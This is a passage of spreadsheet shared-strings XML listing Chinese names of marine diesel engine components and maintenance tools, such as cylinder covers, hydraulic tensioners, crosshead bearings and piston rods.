        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带盖子的链轮箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承座安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油分离器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>甩油环总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油封安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>护套布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带橡胶软管的盖子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手柄安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放气滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带漏斗管的盖子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带填充塞的盖子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热传感器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底管的盖子</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盖子安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞清洁环的布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部单元总成</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮驱动部件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体装配加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水接头安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单向阀安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴架内支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套用横梁</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套固定工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打磨把手</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部前端提升</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部后端提升</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖规格</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>示功阀螺柱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油阀座研磨工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀座研磨工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架回转台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带支架的回转台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖支撑格栅</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀座打磨工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动阀研磨砂轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖紧急液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖拧紧工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖回转附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压环备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖液压螺帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性齿轮安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡重安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非标十字头轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>非标连杆轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆轴承盖孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆固定工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>供油堵头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轨道</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄销轴承提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头销固定工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套管固定工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆拆卸横梁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑块选择</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥弹簧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆底部提升</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头末端液压拉伸器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞底部</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺柱的活塞头</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头选择</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞油盘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护套管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截流孔管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧横挡</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封油控制单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
